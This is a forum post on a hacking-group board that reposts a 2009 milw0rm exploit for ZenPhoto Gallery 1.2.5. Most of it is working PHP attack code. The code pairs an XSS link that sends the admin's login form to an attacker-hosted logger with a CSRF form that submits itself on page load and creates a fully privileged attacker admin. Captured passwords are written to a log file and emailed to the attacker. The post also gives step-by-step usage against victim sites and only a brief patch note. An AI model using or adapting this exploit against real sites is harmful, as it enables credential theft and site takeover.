Multi Ethnic Hacking Group


    ZenPhoto Gallery 1.2.5 Admin Password Reset (CRSF)

    Share
    avatar
    Foxi
    Admin

    Posts : 92
    Reputation : -1
    Join date : 2009-07-08

    ZenPhoto Gallery 1.2.5 Admin Password Reset (CRSF)

    Post by Foxi on Thu Jul 23, 2009 4:16 am

    Code:
    <?php
    ####################################################################
    #    Zen Photo Adminstrator Password Steal/Reset Exploit          #
    #+================================================================+#
    #    Discovered and coded by petros [at] dusecurity.com          #
    #+----------------------------------------------------------------+#
    #    Affects: ZenPhoto Gallery 1.2.5                        #
    #+----------------------------------------------------------------+#
    # Zenphoto is an answer to lots of calls for an online            #
    # gallery solution that just makes sense. After years of          #
    # bloated software that does everything and your dishes,          #
    # zenphoto just shows your photos, simply. It’s got all the        # 
    # functionality and “features” you need, and nothing you don’t.    #
    # Where the old guys put in a bunch of modules and junk, we put    #
    # a lot of thought. We hope you agree with our philosopy:          #
    # simpler is better. Don’t get us wrong though –zenphoto really    #
    # does have everything you need for your online gallery.          #
    #+================================================================+#
    #   Exploit Explaination                      #
    #+================================================================+#
    #                                                                  #
    # This exploit actually advantage of two vulnerabilities.          #
    # The first exploit is a simple XSS in the admin login page        #
    # that will allow us to log the admins password. Unfortunatly,    #
    # it only executes if the admin is NOT already logged in.          #
    # The second is a CRSF exploit that allows you to change the      #
    # admins password by automatically submitting a form.              #
    # This exploit only works if the admin already logged in.          #
    # Combine these and we have two ways to gain admin access          #
    #                                                                  #
    #+--------------------------------------------------------------=-+#
    # How to patch/prevent these vulnernabilities                      #
    #+--------------------------------------------------------------=-+#
    #                                                                  #
    # The XSS in the zp-core/admin.php page can be patched by          #
    # santizing the $_GET['from'] variable before outputting it        #
    #                                                                  #
    # The CRSF requires either some form of referal checking or        #
    # hidden security token on all forms (the latter would be better  #
    #                                                                  #
    #+----------------------------------------------------------------+#
    # How to use this exploit to take over a ZenPhoto website          #
    #+----------------------------------------------------------------+#
    #                                                                  #
    # To use the XSS logger make the admin click this link:            #
    #                                                                  #
    #+--[code snippet - put this all in one line]--+                  #
    # http://victimsite.com/zp-core/admin.php?from="><script>          #
    # document.forms[0].action="[logged url]";                        #
    # </script><div id="lolpwnt                                        #
    #+--[ end of code snippet]--+                                      #
    #                                                                  #
    # Replace [logger url] with the link to this PHP script            #
    # Make sure your log.txt is writable before doing this            #
    # On login the admins password will be saved to the file.          #
    #                                                                  #
    # The next exploit is used by simply giving the link to            #
    # this script to the admin. if he clicks it his password          #
    # will be changed automatically to "ownedbydusec"                  #
    #                                                                  #
    # That's about it :) Enjoy!                                        #
    ####################################################################
    #            petros [at] dusecurity [dot] com                      #
    ####################################################################


    //* Configure the exploit *//
    $site = "http://victim.org/zen-photo";  // URL to vulnerable ZP install (no trailing slash!!)
    $log = "log.txt";         // File to save logs to
    $user = "admin";         // Name of the new admin
    $pass = "ownedbydusec";         // New admin pass
    $email = "you@site.com";      // Email to send log notifications to
    // Do not edit below this line...

    if($_POST)// We got logins from the XSS phisher
    {
       $file = fopen($log, 'a');
       if(!$file) redirect();
       fwrite($file,"--==[{$_SERVER['REMOTE_ADDR']}]==--\r\n");
       foreach($_POST as $key => $value)
          fwrite($file, "$key = $value\r\n");
       fwrite($file,"\r\n");
       fclose($file);
       @mail($email, "ZenPhoto Double Penetration Exploit got a password!", "Please check your log file :)");
       redirect(); //send the back to the admin page
       
    }
    else // try to create a new admin using CRSF
    {
       $inputs = array(
    "saveadminoptions" => "true",

    "totaladmins" => "1",

    "alter_enabled" => "1",

    "0-adminuser" => $user,

    "0-confirmed" => "2",

    "0-adminpass" => $pass,

    "0-adminpass_2" => $pass,

    "0-admin_rights" => "1",

    "0-options_rights" => "1",

    "0-zenpage_rights" => "1",

    "0-tags_rights" => "1",

    "0-themes_rights" => "1",

    "0-all_album_rights" => "1",

    "0-edit_rights" => "1",

    "0-comment_rights" => "1",

    "0-upload_rights" => "1",

    "0-view_rights" => "1",

    "0-main_rights" => "1",

    "0-admin_name" => "Owned by dusecurity.com",

    "0-admin_email" => 'petros was here <3'
    );
       $action = $site."/zp-core/admin-options.php?action=saveoptions";
       echo "<html><head><script>function badboy(){ document.forms[0].submit();{</script></head>";
       echo "<body onload=\"badboy();\"><form action=\"$action\" method=\"POST\">";
       foreach($inputs as $key => $value)
       {
          echo "<input name=\"$key\" value=\"$value\" type=\"hidden\" />";
       }
       echo '<input type="submit" value="Click Me!" />'; //not that they have a choice lol
       echo "</form></body></html>";
       // notify them by e-mail because the admin will probably notice he cant login
       @mail($email,"ZenPhoto Double Penetration Exploit Success!", "Site: $site/zp-core/admin.php\nUsername: $user\nPassword: $pass");
    }


    function redirect(){ header("Location: $site/zp-core/admin.php");exit; }

    ?>

    # milw0rm.com [2009-07-16]


      Current date/time is Tue Jul 25, 2017 12:45 am